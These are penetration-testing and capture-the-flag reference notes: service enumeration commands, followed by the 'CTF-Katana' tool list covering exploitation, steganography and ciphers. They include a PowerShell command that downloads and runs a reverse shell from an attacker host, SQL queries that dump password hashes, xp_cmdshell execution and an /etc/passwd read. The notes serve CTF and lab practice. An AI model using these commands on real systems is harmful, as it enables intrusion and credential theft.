# https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067 nmap -Pn -sV -p 445 --script="smb-vuln-ms08-067" --script-args="unsafe=1" -oN "tcp_445_smb_ms08-067.txt" $ip # Eternalblue # https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 nmap -p 445 --script smb-vuln-ms17-010 -oN "tcp_445_smb_ms08-067.txt" $ip ``` ### IMAP/IMAPS (143/tcp, 993/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p $port "--script=banner,(imap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN tcp_port_imap_nmap.txt $ip ``` ### SNMP (161/udp) ```text # Version detection + NSE scripts sudo nmap -Pn -sU -sV -p 161 --script="banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "udp_161_snmp-nmap.txt" $ip ``` **Brute force community strings** ```text onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $ip 2>&1 | tee "udp_161_snmp_onesixtyone.txt" ``` **snmpwalk** ```text # Enumerate entire MIB tree snmpwalk -c public -v1 -t 10 $ip # Enumerate Windows users snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 # Enumerate running Windows processes snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 # Enumerate open TCP ports snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 # Enumerate installed software snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 ``` **Enumerate SNMP device (places info in readable format)** ```text snmp-check $ip -c public ``` ### LDAP (389/tcp, 3268/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p $port --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "tcp_port_ldap_nmap.txt" $ip ``` **enum4linux** ```text enum4linux -a -M -l -d $ip 2>&1 | tee "enum4linux.txt" ``` ### Java RMI (1100/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 1100 --script="banner,rmi-vuln-classloader,rmi-dumpregistry" -oN "tcp_110_rmi_nmap.txt" $ip ``` ### MSSQL (1433/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 1433 --script="banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="mssql.instance-port=1433,mssql.username=sa,mssql.password=sa" -oN "tcp_1433_mssql_nmap.txt" $ip ``` **mssqlclient&#46;py** ```text # MSSQL shell mssqlclient.py -db msdb hostname/sa:password@$ip # List databases SELECT name FROM master.dbo.sysdatabases # List tables SELECT * FROM <database_name>.INFORMATION_SCHEMA.TABLES # List users and password hashes SELECT sp.name AS login, sp.type_desc AS login_type, sl.password_hash, sp.create_date, sp.modify_date, CASE WHEN sp.is_disabled = 1 THEN 'Disabled' ELSE 'Enabled' END AS status FROM sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id WHERE sp.type NOT IN ('G', 'R') ORDER BY sp.name ``` ### Oracle TNS listener (1521/tcp) **tnscmd10g** ```text tnscmd10g version -h $ip tnscmd10g status -h $ip ``` ### NFS (2049/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 111,2049 --script="banner,(rpcinfo or nfs*) and not (brute or broadcast or dos or external or fuzzer)" -oN "tcp_111_2049_nfs_nmap.txt" $ip ``` **Show mount information** ```text showmount -e $ip ``` **Mount share** ```text sudo mount -o rw,vers=2 $ip:/home /mnt # '-o nolock' used to disable file locking, needed for older NFS servers sudo mount -o nolock $ip:/home /mnt/ ``` ### MySQL (3306/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "tcp_3306_mysql_nmap.txt" $ip ``` **MySQL shell** ```text mysql --host=$ip -u root -p ``` **MySQL system variables** ```text SHOW VARIABLES; ``` **Show privileges granted to current user** ```text SHOW GRANTS; ``` **Show privileges granted to root user** ```text # Replace 'password' field with 'authentication_string' if it does not exist SELECT user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv FROM mysql.user WHERE user = 'root'; ``` **Exact privileges** ```text SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; ``` **Enumerate file privileges (see [here](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_file) for discussion of file_priv)** ```text SELECT user FROM mysql.user WHERE file_priv='Y'; ``` ### RDP (3389/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 3389 --script="banner,(rdp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "tcp_3389_rdp_nmap.txt" $ip ``` ### SIP (5060/udp) **Scans for SIP devices on network** ```text svmap $ip ``` **Identifies active extensions on PBX** ```text svwar -m INVITE -e 200-250 $ip ``` ### PostgreSQL (5432/tcp) **Log into postgres remotely** ```text PGPASSWORD=postgres psql -h $ip -p 5437 -U postgres ``` **List databases** ```text \list SELECT datname FROM pg_database; ``` **Use postgres database** ```text \c postgres ``` **List tables** ```text \d ``` **Describe table** ```text \d table ``` **Check if current user superuser (on = yes, off = no)** ```text SELECT current_setting ('is_superuser'); ``` **Get user roles** ```text \du+ ``` **Check user’s privileges over table (pg_shadow)** ```text SELECT grantee, privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'; ``` **Read file (/etc/passwd)** ```text CREATE TABLE demo(t text); COPY demo FROM '/etc/passwd'; SELECT * FROM demo; ``` **Read usernames and password hashes** ```text # Postgresql password hash format: md5(secret || username) where || denotes string concatenation (remove md5 before cracking hash) SELECT usename, passwd from pg_shadow; ``` **Check if plpgsql enabled** ```text # Below result indicates that plpgsql enabled: # lanname | lanacl #---------+--------- # plpgsql | SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql' ``` **PostgreSQL config file location** ```text SHOW config_file; ``` ### VNC (5900/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 5900 --script="banner,(vnc* or realvnc* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="unsafe=1" -oN "tcp_5900_vnc_nmap.txt" $ip ``` ### AJP (8009/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 8009 -n --script ajp-auth,ajp-headers,ajp-methods,ajp-request -oN tcp_8009_ajp_nmap.txt $ip ``` ## Active Directory **Enumerate users** ```text net user net user /domain net user $domain_user /domain ``` **Enumerate groups** ```text net group /domain # Includes domain users that are part of local administrators group net localgroup administrators ``` **PowerView** ```text # Import PowerView PS> Import-Module .\PowerView.ps1 # Get info about current domain PS> Get-NetDomain # List members of Domain Admins group PS> Get-NetGroupMember -GroupName "Domain Admins" # List all computers in domain PS> Get-NetComputer # Enumerate logged-on users # NB: only lists users logged on to target if we have local administrator privileges on target PS> Get-NetLoggedon -ComputerName $hostname # Enumerate active user sessions on servers e.g. file servers or domain controllers PS> Get-NetSession -ComputerName $hostname # Enumerate SPNs PS> Get-NetUser -SPN | select serviceprincipalname ```
CTF-Katana =============== > John Hammond | February 1st, 2018 -------------------------- This repository, at the time of writing, will just host a listing of tools and commands that may help with CTF challenges. I hope to keep it as a "live document," and ideally it will not die out like the old "tools" page I had made ([https://github.com/USCGA/tools](https://github.com/USCGA/tools)). **The formal tool that automates some of this low-hanging fruit checking is finally released. Katana is available at [https://github.com/JohnHammond/katana](https://github.com/JohnHammond/katana).** Pull-requests and contributions are welcome! --------------- # Table of Contents 1. [Post-Exploitation](#post-exploitation) 2. [Port Enumeration](#port-enumeration) 3. [445 (smb/Samba)](#445-smbsamba) 4. [1433 (Microsoft SQL Server)](#1433-microsoft-sql-server) 5. [SNMP](#snmp) 6. [Microsoft Office Macros](#microsoft-office-macros) 7. [Retrieving Network Service Hashes](#retrieving-network-service-hashes) 8. [Windows Reverse Shells](#windows-reverse-shells) 9. [Known Exploits](#known-exploits) 10. [Excess](#excess) 11. [Esoteric Languages](#esoteric-languages) 13. [Steganography](#steganography) 14. [Cryptography](#cryptography) 15. [Networking](#networking) 16. [PHP](#php) 17. [PDF Files](#pdf-files) 18. [Forensics](#forensics) 19. [PNG File Forensics](#png-file-forensics) 20. [APK Forensics](#apk-forensics) 21. [Web](#web) 22. [Reverse Engineering](#reverse-engineering) 23. [PowerShell](#powerShell) 24. [Windows Executables](#windows-executables) 25. [Python Reversing](#python-reversing) 26. [Binary Exploitation/pwn](#binary-exploitationpwn) 27. [VisualBasicScript Reversing](#visualbasicscript-reversing) 28. [Miscellaneous](#miscellaneous) 29. [Jail Breaks](#jail-breaks) 30. [Trivia](#trivia) --------------- Post-Exploitation ==================== * [static-binaries] If you need to use a program that is not on the box you just broke into, try and build a static binary! I've seen this used on Fatty for HackTheBox, getting a `pty` with the typical `python -c 'import pty...'` trick when it didn't have Python originally! https://github.com/andrew-d/static-binaries Port Enumeration ==================== 445 (smb/Samba) ----------------------- * [`smbmap`](https://github.com/ShawnDEvans/smbmap) `smbmap` tells you permissions and access, which `smbclient` does _not_ do! To try and list shares as the anonymous user **DO THIS** (this doesn't always work for some weird reason) ``` smbmap -H 10.10.10.125 -u anonymous ``` Or you can attempt just: ``` smbmap -H 10.10.10.125 ``` And you can specify a domain like so: ``` smbmap -H 10.10.10.125 -u anonymous -d HTB.LOCAL ``` Worth trying `localhost` as a domain, if that gets "NO_LOGON_SERVERS" ``` smbmap -H 10.10.10.125 -u anonymous -d localhost ``` * `enum4linux` ``` enum4linux 10.10.10.125 ``` * `smbclient` **NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with `-m SMB2`. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 _by default_.** You can use `smbclient` to look through files shared with SMB. To _list_ available shares: ``` smbclient -m SMB2 -N -L //10.10.10.125/ ``` Once you find a share you want to/can access, you can connect to shares by using the name following the locator: ``` smbclient -m SMB2 -N //10.10.10.125/Reports ``` You will see a `smb: \>` prompt, and you can use `ls` and `get` to retrieve files or even `put` if you need to place files there. 1433 (Microsoft SQL Server) ------------------------------ * `impacket` -> `mssqlclient.py` You can connect to a Microsoft SQL Server with `myssqlclient.py` knowing a username and password like so: ``` mssqlclient.py [email protected] ``` It will prompt you for a password. **If your password fails, the server might be using "Windows authentication", which you can use with:** ``` mssqlclient.py [email protected] -windows-auth ``` If you have access to a Micosoft SQL Server, you can try and `enable_xp_cmdshell` to run commands. With `mssqlclient.py` you can try: ``` SQL> enable_xp_cmdshell ``` though, you may not have permission. If that DOES succeed, you can now run commands like: ``` SQL> xp_cmdshell whoami ``` SNMP ---------------- * snmp-check ``` snmp-check 10.10.10.125 ``` Microsoft Office Macros --------------- * [`oletools`](https://github.com/decalage2/oletools) -> `olevba` `olevba` can look for Macros within office documents (which you should always check) with just supplying the filename: ``` olevba "Currency Volume Report.xlsm" ``` Retrieving Network Service Hashes ---------------------------------- * [`Responder.py`](https://github.com/SpiderLabs/Responder) ``` ./Responder.py -I tun0 ``` Windows Reverse Shells --------------------------- * [Nishang][nishang] If you have access to PowerShell, you can get a Reverse shell by using [nishang]'s `Invoke-PowerShellTcp.ps1` script inside of the `Shells` directory. Be sure to add the function call example to the bottom of your script, so all you need to to do to host it is (on your Attacker machine): ``` python -m SimpleHTTPServer ``` and then on the victim machine: ``` powershell IEX( New-Object Net.WebClient).DownloadString("http://10.10.14.6:8000/reverse.ps1") ) ``` Also, if you want to have nice up and down arrow key usage within your Windows reverse shell, you can use the utility `rlwrap` before your netcat listener command. ``` rlwrap nc -lnvp 9001 ``` Known Exploits ------------------ * Java RMI Metasploit module: `exploit/multi/misc/java_rmi_server` When testing this, responses are _known to come back with an error or exception_. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And _use Python_ to live off the land and try avoid special characters, like `|` pipes! [ysoserial](https://github.com/frohoff/ysoserial) is a good tool for deserializing Java code to take advantage of this vulnerability. * Heartbleed Metasploit module: `auxiliary/scanner/ssl/openssl_heartbleed` Be sure to use `set VERBOSE true` to see the retrieved results. This can often contain a flag or some valuable information. * libssh - SSH `libssh0.8.1` (or others??) is vulnerable to an easy and immediate login. Metasploit module: `auxiliary/scanner/ssh/libssh_auth_bypass`. Be sure to `set spawn_pty true` to actually receive a shell! Then `sessions -i 1` to interact with the shell spawned (or whatever appropriate ID) * Bruteforcing RDP Bruteforcing RDP with `hydra` or `ncrack` is __NOT ALWAYS ADVISABLE__ because of Cred-SSB. An option _might_ be to script xrdp to automate against a password or word list... __but THIS IS NOT TESTED__. * Apache Tomcat If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit `/Manager`, which is usually accessible on Tomcat. Possible credentials could be `tomcat:tomcat`, `tomcat:s3cr3t`, `admin:s3cr3t`, `root:s3cr3t`, etc. etc.. Worthy of bruteforcing with `hydra`. If you see URLs are appended with a `.action` (not a `.do`), you may be working with Apache Struts. * Apache Struts To identify the Apache Struts version is running, Excess -------- * [wifite2](https://github.com/derv82/wifite2) Brute-force a Wi-Fi access point. * [impacket](https://github.com/SecureAuthCorp/impacket) Tool to quickly spin up a Samba share. * [enum4linux](https://github.com/portcullislabs/enum4linux) Script to scan Windows Samba shares. VERY GOOD TO RUN FOR WINDOWS ENUMERATION. * [drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) Attack script for old or outdated Drupal servers. Usually very effective. Esoteric Languages ----------------------- * [Try It Online](https://tio.run/) An online tool that has a ton of Esoteric language interpreters. * [Brainfuck](https://esolangs.org/wiki/brainfuck) This language is easily detectable by its huge use of plus signs, braces, and arrows. There are plenty of online interpreters, like this one: [https://copy.sh/brainfuck/](https://copy.sh/brainfuck/) Some example code: ``` ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.----------- --.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.------------- --.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++ .<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++. ``` * [COW](https://esolangs.org/wiki/COW) This language is easily identified by numerous "MOO" statements and random capitalization. It has an option on [https://tio.run/](https://tio.run/) Some example code: ``` MoO moO MoO mOo MOO OOM MMM moO moO MMM mOo mOo moO MMM mOo MMM moO moO MOO MOo mOo MoO moO moo mOo mOo moo ``` * [Malboge](https://esolangs.org/wiki/malbolge) An esoteric language that looks a lot like Base85... but isn't. Often has references to "Inferno" or "Hell" or "Dante." Online interpreters like so: [http://www.malbolge.doleczek.pl/](http://www.malbolge.doleczek.pl/) Some example code: ``` (=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc ``` * [Piet](https://esolangs.org/wiki/piet) A graphical programming language... looks like large 8-bit pixels in a variety of colors. Can be interpreted with the tool [`npiet`][npiet] ![https://www.bertnase.de/npiet/hi.png](https://www.bertnase.de/npiet/hi.png) * [Ook!](http://esolangs.org/wiki/ook!) A joke language. Recognizable by `.` and `?`, and `!`. Online interpreter for this language: [https://www.dcode.fr/ook-language](https://www.dcode.fr/ook-language) Some example code: ``` Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. ``` * [Rockstar](https://esolangs.org/wiki/Rockstar) A language intended to look like song lyrics [github link](https://github.com/RockstarLang/rockstar). Rockstar has an official online interpreter which you can find here: [https://codewithrockstar.com/online](https://codewithrockstar.com/online) below is fizzbuzz in Rockstar: ``` Midnight takes your heart and your soul While your heart is as high as your soul Put your heart without your soul into your heart Give back your heart Desire is a lovestruck ladykiller My world is nothing Fire is ice Hate is water Until my world is Desire, Build my world up If Midnight taking my world, Fire is nothing and Midnight taking my world, Hate is nothing Shout "FizzBuzz!" Take it to the top If Midnight taking my world, Fire is nothing Shout "Fizz!" Take it to the top If Midnight taking my world, Hate is nothing Say "Buzz!" Take it to the top Whisper my world ``` Steganography --------------------- * [StegCracker][StegCracker] Don't ever forget about [`steghide`][steghide]! This tool can use a password list like `rockyou.txt` with steghide. SOME IMAGES CAN HAVE MULTIPLE FILED ENCODED WITH MULTIPLE PASSWORDS. * [Steganography Online](http://stylesuxx.github.io/steganography/) A tool often used in CTFs for encoding messages into images. * [StegSeek][StegSeek] This is similar to `stegcracker`, but _much_ faster. Can also extract metadata without a password list. * [`steg_brute.py`](https://github.com/Va5c0/Steghide-Brute-Force-Tool) This is similar to `stegcracker` above. * [`openstego`][OpenStego] A [Java][Java] [`.JAR`][JAR] tool, that can extract data from an image. A good tool to use on guessing challenges, when you don't have any other leads. We found this tool after the [Misc50](http://0xahmed.ninja/nullcon-hackim18-ctf-writeups/) challenge from [HackIM 2018](https://ctftime.org/event/566) * [`Stegsolve.jar`][Stegsolve.jar] A [Java][Java] [`.JAR`][JAR] tool, that will open an image and let you as the user arrow through different renditions of the image (viewing color channels, inverted colors, and more). The tool is surprisingly useful. * [`steghide`][steghide] A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge. * [`stepic`](http://domnit.org/stepic/doc/) Python image steganography. Stepic hides arbitrary data inside PIL images. Download it here: http://domnit.org/stepic/doc/ * [Digital Invisible Ink Stego Tool](http://diit.sourceforge.net/) A Java steganography tool that can hide any sort of file inside a digital image (regarding that the message will fit, and the image is 24 bit colour) # WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD! * [ImageHide](https://www.softpedia.com/get/Security/Encrypting/ImageHide.shtml) For PNG images (or BMP) images, there exists a Windows utility that can hide "ENCRYPTED" text within the LSB. If you also happen to have passwords, you can decrypt this and potentially find a flag. [https://www.softpedia.com/get/Security/Encrypting/ImageHide.shtml](https://www.softpedia.com/get/Security/Encrypting/ImageHide.shtml) * [stegoVeritas](https://github.com/bannsec/stegoVeritas/) Another steganography tool. A simple command-line tool and super easy to use -- definitely one to at least try. * Unicode Steganography / Zero-Width Space Characters Some text that may be trying to hide something, in a seemingly innocent way, like "Hmm, there may be something hiding here..." may include zero-width characters. This is a utility that might help: [https://330k.github.io/misc_tools/unicode_steganography.html](https://330k.github.io/misc_tools/unicode_steganography.html) ... Other options are just gross find and replace operations in Python IDLE. * Online LSB Tools There are many online LSB tools that work in different ways. If you are given a file that you know is part of a Least Significant Bit challenge, try these tools: [https://manytools.org/hacker-tools/steganography-encode-text-into-image/](https://manytools.org/hacker-tools/steganography-encode-text-into-image/) Only supports PNG [https://stylesuxx.github.io/steganography/](https://stylesuxx.github.io/steganography/) * Other stego tools: [https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit) * [`zsteg`][zsteg] Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images. * [`jsteg`][jsteg] Another command-line tool to use against JPEG images. [https://github.com/lukechampine/jsteg](https://github.com/lukechampine/jsteg) Handy for Hackerrank Codefest CTF 2018. * [Jstego][Jstego] A GUI tool for JPG steganography. [https://sourceforge.net/projects/jstego/](https://sourceforge.net/projects/jstego/) It is a [Java][Java] [JAR] file similar to stegsolve.jar * Morse Code Always test for this if you are seeing two distinct values... _it may not always be binary!_ Online decoders like so: [https://morsecode.scphillips.com/translator.html](https://morsecode.scphillips.com/translator.html). If you need to be case-sensistive or include a bit more stuff like numbers and punctuation, use this code: [https://gist.github.com/JohnHammond/961acabfd85a8715220fa79492b25368](https://gist.github.com/JohnHammond/961acabfd85a8715220fa79492b25368) If you find Morsecode in the "international written form", like "dah-dit-dit-dah" etcetera, you can use this code: [https://gist.github.com/JohnHammond/7d3ddb167fa56f139dc4419091237b51](https://gist.github.com/JohnHammond/7d3ddb167fa56f139dc4419091237b51) ... which was carved out of this resource: [https://morsecode.scphillips.com/morse.html](https://morsecode.scphillips.com/morse.html) * Whitespace Tabs and spaces could be representing 1's and 0's and treating them as a binary message... or, they could be whitespace done with [`snow`][snow] or an esoteric programming language interpreter: [https://tio.run/#whitespace](https://tio.run/#whitespace) * Audio Speed Change (also change pitch) ``` mplayer -af scaletempo -speed 64 flag.mp3 ``` * DNA Codes When given a sequence with only A, C, G, T , there is an online mapping for these. Try this: ![img/dna_codes.png](img/dna_codes.png) ![img/genome_coding.jpg](img/genome-coding.jpg) * Extract Thumbnail (data is covered in original image) If you have an image where the data you need is covered, try viewing the thumbnail: ``` exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg ``` * [`snow`][snow] A command-line tool for whitespace steganography (see above). * SONIC Visualizer (audio spectrum) Some classic challenges use an audio file to hide a flag or other sensitive stuff. SONIC visualizer easily shows you [spectrogram](https://en.wikipedia.org/wiki/Spectrogram). __If it sounds like there is random bleeps and bloops in the sound, try this tactic!__ * [XIAO Steganography](https://xiao-steganography.en.softonic.com/) Being a Windows-specific tool, it is often used in CTFs to hide flags inside audio files. __Take a look if the challenge has some odd strings which might resemble passwords.__ * [Detect DTMF Tones] Audio frequencies common to a phone button, DTMF: [https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling](https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling). * Phone-Keypad Some messages may be hidden with a string of numbers, but really be encoded with old cell-phone keypads, like text messaging with numbers repeated: ![https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov](https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov) * [`hipshot`][hipshot] A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion. * [QR code] A small square "barcode" image that holds data. * [`zbarimg`][zbarimg] A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image: ``` sudo apt install zbar-tools ``` * Punctuation marks `!`, `.` and `?` I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing! Cryptography ----------------- * Cryptii [https://cryptii.com](https://cryptii.com) has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more. * Keyboard Shift [https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift... * Bit Shift Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ). * Reversed Text Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in [Python] like so: ``` "UOYMORFEDIHOTGNIYRTEBTHGIMFTCA.TAHTTERCESASISIHT"[::-1] ``` * XOR ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in `\xde\xad\xbe\xef` etc..) Note that you can do easy XOR locally with Python like so (you need `pwntools` installed): ``` python python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER") ``` # IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY # DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES. * Caesar Cipher The most classic shift cipher. Tons of online tools like this: [https://www.dcode.fr/caesar-cipher](https://www.dcode.fr/caesar-cipher) or use `caesar` as a command-line tool (`sudo apt install bsdgames`) and you can supply a key for it. Here's a one liner to try all letter positions: ``` cipher='jeoi{geiwev_gmtliv_ws_svmkmrep}' ; for i in {0..25}; do echo $cipher | caesar $i; done ``` __Be aware!__ Some challenges include punctuation in their shift! If this is the case, try to a shift within all 255 ASCII characters, not just 26 alphabetical letters! * `caesar` A command-line caesar cipher tool (noted above) found in the `bsdgames` package. * [Atbash Cipher] If you have some text that you have no idea what it is, try the [Atbash cipher]! It's a letter mapping, but the alphabet is reversed: like `A` maps to `Z`, `B` maps to `Y` and so on. There are tons of online tools to do this ([http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)), and you can build it with [Python]. * [Vigenere Cipher] [http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx), [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) and personal Python code here: [https://pastebin.com/2Vr29g6J](https://pastebin.com/2Vr29g6J) * Gronsfeld Cipher A variant of the Vignere cipher that uses numbers insteads of letters. [http://rumkin.com/tools/cipher/gronsfeld.php](http://rumkin.com/tools/cipher/gronsfeld.php) * Beaufourt Cipher [https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher) * [Bacon Cipher](https://en.wikipedia.org/wiki/Bacon%27s_cipher) A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary `b00000`. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: `AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA`. [Online tool](http://rumkin.com/tools/cipher/baconian.php) * Python random module cracker/predictor [https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module. * Transposition Cipher * RSA: Classic RSA Variables typically given: `n`, `c`, `e`. _ALWAYS_ try and give to [http://factordb.com](http://factordb.com). If `p` and `q` are able to be determined, use some RSA decryptor; handmade code available here: [https://pastebin.com/ERAMhJ1v](https://pastebin.com/ERAMhJ1v) * RSA: Multi-prime RSA When you see multi-prime RSA, you can use calculate `phi` by still using all the factors. ``` phi = (a - 1) * (b - 1) * (c - 1) # ... etcetera ``` __If FactorDB cannot find factors, try alpertron: [https://www.alpertron.com.ar/ECM.HTM](https://www.alpertron.com.ar/ECM.HTM)__ * RSA: `e` is 3 (or small) If `e` is 3, you can try the cubed-root attack. If you the cubed root of `c`, and if that is smaller than the cubed root of `n`, then your plaintext message `m` is just the cubed root of `c`! Here is [Python] code to take the cubed root: ``` def root3rd(x): y, y1 = None, 2 while y!=y1: y = y1 y3 = y**3 d = (2*y3+x) y1 = (y*(y3+2*x)+d//2)//d return y ``` * RSA: Wiener's Little D Attack The telltale sign for this kind of challenge is an enormously large `e` value. Typically `e` is either 65537 (0x10001) or `3` (like for a Chinese Remainder Theorem challenge). Some stolen code available here: [https://pastebin.com/VKjYsDqD](https://pastebin.com/VKjYsDqD) * RSA: Boneh-Durfee Attack The tellgate sign for this kind of challenge is also an enormously large `e` value (`e` and `n` have similar size). Some code for this attack can be found [here](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage) * RSA: Chinese Remainder Attack These challenges can be spotted when given mutiple `c` cipher texts and multiple `n` moduli. `e` must be the same number of given `c` and `n` pairs. Some handmade code here: [https://pastebin.com/qypwc6wH](https://pastebin.com/qypwc6wH) * [LC4] This is an adaptation of RC4... just not. There is an implementation available in Python. [https://github.com/dstein64/LC4/blob/master/documentation.md](https://github.com/dstein64/LC4/blob/master/documentation.md) * Elgamal * Affine Cipher * Substitution Cipher (use quip quip!) [https://quipqiup.com/](https://quipqiup.com/) * Railfence Cipher [http://rumkin.com/tools/cipher/railfence.php](http://rumkin.com/tools/cipher/railfence.php) * [Playfair Cipher] racker: [http://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html](http://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html) * Polybius Square [https://www.braingle.com/brainteasers/codes/polybius.php](https://www.braingle.com/brainteasers/codes/polybius.php) * The Engima [http://enigma.louisedade.co.uk/enigma.html](http://enigma.louisedade.co.uk/enigma.html), [https://www.dcode.fr/enigma-machine-cipher](https://www.dcode.fr/enigma-machine-cipher) * AES ECB The "blind SQL" of cryptography... leak the flag out by testing for characters just one byte away from the block length. * Two-Time Pad * [International Code of Signals Maritime] First drafted by the British Board of Trade in 1855 and adopted as a world-wide standard on 1 January 1901. It is used for communications with ships, but also occasionally used by geocaching mystery caches (puzzle caches), CTFs and various logic puzzles. You may want to give a look at the tool [maritime flags translator]. ![https://www.marvindisplay.com/images/SignalFlags.gif](https://www.marvindisplay.com/images/SignalFlags.gif) * Daggers Cipher The daggers cipher is another silly text-to-image encoder. This is the key, and you can find a decoder on [https://www.dcode.fr/daggers-alphabet](https://www.dcode.fr/daggers-alphabet). ![img/dagger_cipher.png](img/dagger_cipher.png) * Hylian Language (Twilight Princess) The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on [https://www.dcode.fr/hylian-language-twilight-princess](https://www.dcode.fr/hylian-language-twilight-princess). ![img/hylian.png](img/hylian.png) * Hylian Language (Breath of the Wild) The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on 